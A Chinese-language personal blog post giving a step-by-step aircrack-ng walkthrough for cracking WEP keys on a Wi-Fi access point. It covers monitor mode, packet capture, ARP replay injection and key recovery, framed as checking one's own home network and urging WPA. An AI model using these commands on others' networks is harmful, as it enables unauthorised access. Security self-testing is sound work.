如何檢查自己家的無線網路好不好破解



哦…首先我的分類有一個Hack,但又很沒內容
所以想加點內容,最近開始進階深入碰Linux,發現他根本個超強批次執行的OS
簡直把For Next語法用到淋漓盡致!(開玩笑的,是最近寫程式一直用,在Linux下是用Shell寫C#來跑)

所以先小增一篇比較有實際層面的東西

//請不要把以下教學應用在別人家的無線基地台,這樣是違法的(我一定要先講明在先,這樣我才沒有犯法)
//請不要跟別人說你會做這件事,然後一直到處宣揚自己很厲害,一山比一山高,請保持謙虛的態度持續學習才是上策

首先,家用無線網路的加密技術分為幾個技術
WEP
WPA
WPA2

其中WEP已經是很老舊的技術
幾乎所以有可以採用WIFI的裝置其中加密演算法一定有WEP(沒有的話…應該就不能叫WIFI了)

很多人家的無線網路常常不是沒設密碼就是設了WEP格式的密碼
很容易被“壞鄰居”給盜用
(高雄無線網路不密集…想偷連還沒得連,比較實際的是在電子科的時候…常常看到有鎖碼的基地台但沒辦法連的時候派上用場)

以下教學是要說明WEP是個連script kiddie都會用的方法(前提是還是要會Linux的 script kiddie)

前幾天在BlackTrack4(一個白帽Linux Hack的社群)
看到教學

實際去跑也有成功
不過效率沒有以前看到的那套來的好(到底是哪套呢?…請去GOOGLE找吧)
但要做的步驟少很多,所以還蠻適合打出來”傳授”一下

不過她的示範試用BlackTrack4的自製Linux 基於KDE
但我不想再為了這樣而去重裝,畢竟只是套件有沒有包含在裡面的問題

 缺了去網路上抓即可
如果你不是用BlackTrack的Linux(像我就是用Ubuntu 9.10)
但也沒關係

還是有方法解決的

拿到要來測試妳無線網路安全的”aircrack-ng”
sudo apt-get install aircrack-ng

安裝完之後請自行確認你的無線網路卡是可以在Ubuntu下運作的

接著
sudo airmon-ng

就會出現一個你電腦上wlan的列表
記住妳要使用的無線網卡的Dev Num(Interface那欄)

如果沒意外電腦只有裝一張網路卡的話
應該會像我一樣是wlan0

接著要讓airmon-ng套件新增一個監控網卡來過濾妳這張網路卡的收發資訊

先停掉你的網卡
sudo airmon-ng stop [妳的網卡名稱]
像我這邊示範則是要打(打的時候去掉中括號)
sudo airmon-ng stop wlan0

接著再讓airmon-ng開啟你的網卡並且加入一張虛擬的監控網卡
sudo airmon-ng start [妳的網卡名稱]

完成之後看一下是否有加入airmon-ng的監控網卡:
sudo airmon-ng

如果沒問題,會多出一張mon0

然後要取得你周遭的WiFi基地台的BSSID,ESSID,Channel等等資訊
sudo airodump-ng [妳的網卡名稱]

輸入完成後會出現一張列表
列出你周遭的WiFi基地台
找到妳要測試基地台的BSSID(也就是MAC)

接著按下Ctrl+C跳離監控程序

選擇妳要測試的對象:
sudo airodump-ng -w wep -c [頻道號碼] –bssid [BSSID碼] [妳的網卡名稱]

就會開始嘗試連線到妳選取的基地台

===========================================================
另外再打開另外一個終端機:

然後打入sudo aireplay-ng -1 0 -a [BSSID] [妳的網卡名稱]
來設定不同組合的暴力破解嘗試

===========================================================
ok之後再開啟另外一個終端機:

打入
sudo aireplaye-ng -3 -b [BSSI碼] [妳的網卡名稱]
進行傳送封包來暴力破解

接著切換到第一個終端機(也就是有妳連線到哪個基地台資訊的終端機)
看著有一欄叫做“#Data”

當Data那欄的數字大於30000
切換到第三個終端機(也就是妳傳送封包來暴力破解的那個終端機)

按下ctrl+c結束傳送封包

接著打入dir看妳家目錄下的破解結果

sudo aircrack-ng [檔案名稱].cap
像我這就是sudo aircrack-ng wep-01.cap

接著就可以看到妳的16進位的WEP KEY

自行換算16進位之後則是密碼(啥?不會算?….不會算那你前面做得來也挺厲害的)

只要簡單的步驟就可以輕而易舉破解WEP KEY

可以顯示WEP KEY是有多好破解

所以大家以後設定WIFI基地台密碼的時候
請盡量選WPA以上的等級

不過有些好一點的基地台,都有防這些類似DDOS的攻擊
像我家的Corega CG-WLBARN50就會擋掉這些攻擊
讓我跑了12個小時還是沒結果=_______=

判斷為ACK直接被拒絕往來T__T

最後換成比較老舊的PCI BLW-54SG,大約兩小時就被破解出來
因為T91MT的網卡沒有說非常好
連續injetion的時候會有堵塞,沒辦法快速送出封包來測試

如果要破解WAP以及更新的技術也是可以
但請自己aircrack-ng –help自行參閱參數搭配

因為在講下去就很不道德了
(其實是步驟更多懶得打|||…)

但其實真的想要偷鄰居網路
直接在Windows底下找破解程式其實就有了

但是這樣一來妳的電腦反而有可能被人家破解
因為那些程式通常是Black HACK所撰寫
很有可能被植入木馬後門

所以如果想當”script kiddie”
就得冒這個風險

不想冒風險,就學點東西吧!

Good Luck!

3 Comments

  1. 好久沒看到你了,
    聽說你們的計畫沒過!
    沒關係,下次再努力!
    但是,沒通過,那麼時間就更有彈性了。
    這個禮拜,還是來團契吧!
    上帝還是會透過聚會向你說話的。
    版主回覆:(11/29/2011 08:06:49 AM)

  2. 什麼….好複雜@@
    版主回覆:(11/29/2011 08:06:49 AM)
    科科…

  3. brestrogen ingredient

    如何檢??自己家的無線網路好不好破解 @ nathaniel-終端?人? :: 痞客邦 pixnet ::

Leave a comment

這個網站採用 Akismet 服務減少垃圾留言。進一步瞭解 Akismet 如何處理網站訪客的留言資料